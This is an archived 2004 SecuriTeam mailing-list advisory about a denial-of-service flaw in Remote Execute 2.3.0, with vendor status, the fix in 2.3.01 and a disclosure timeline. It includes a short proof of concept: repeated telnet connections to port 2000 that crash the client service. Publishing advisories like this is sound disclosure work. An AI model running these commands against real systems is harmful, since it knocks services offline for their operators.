[NT] Remote Execute DoS Attack Leads to Client Crash

From: SecuriTeam (support_at_securiteam.com)
Date: 12/12/04

  • Next message: SecuriTeam: "[REVS] Multiple Collisions attack on MD5 and other Hashing Algorithms" 
    To: list@securiteam.com
Date: 12 Dec 2004 10:23:15 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Remote Execute DoS Attack Leads to Client Crash
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.ibexsoftware.com/remote.asp> Remote Execute allows you to
    "Manage your network with ease and safety, execute applications on Your
    internal/external network from one central location."

    By creating multiple connections to the Remote Execute component it is
    possible to cause a denial of service condition.

    DETAILS

    Vulnerable Systems:
     * Remote Execute version 2.3.0

    Immune Systems:
     * Remote Execute version 2.3.01

    After seven connections are created to the client service it will crash
    and refuse any further connections. In order to demonstrate the problem,
    issue the following:

    telnet remotehost 2000 &
    telnet remotehost 2000 &
    telnet remotehost 2000 &
    telnet remotehost 2000 &
    telnet remotehost 2000 &
    telnet remotehost 2000 &
    telnet remotehost 2000 &
    ..

    The remote execute client is now down and port 2000 is now closed and not
    able to receive any more connections.

    Vendor Status:
    IbexSoftware were contacted, the problem was reproduced and a fix was
    released a week later. Users are highly encouraged to upgrade to version
    2.3.01 which mitigates this vulnerability.

    Disclosure Timeline:
    29/11/2004 - Vendor notification
    06/12/2004 - Public release

    ADDITIONAL INFORMATION

    The information has been provided by
    <mailto:headpimp@pimp-industries.com> Pimp Industries.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[REVS] Multiple Collisions attack on MD5 and other Hashing Algorithms"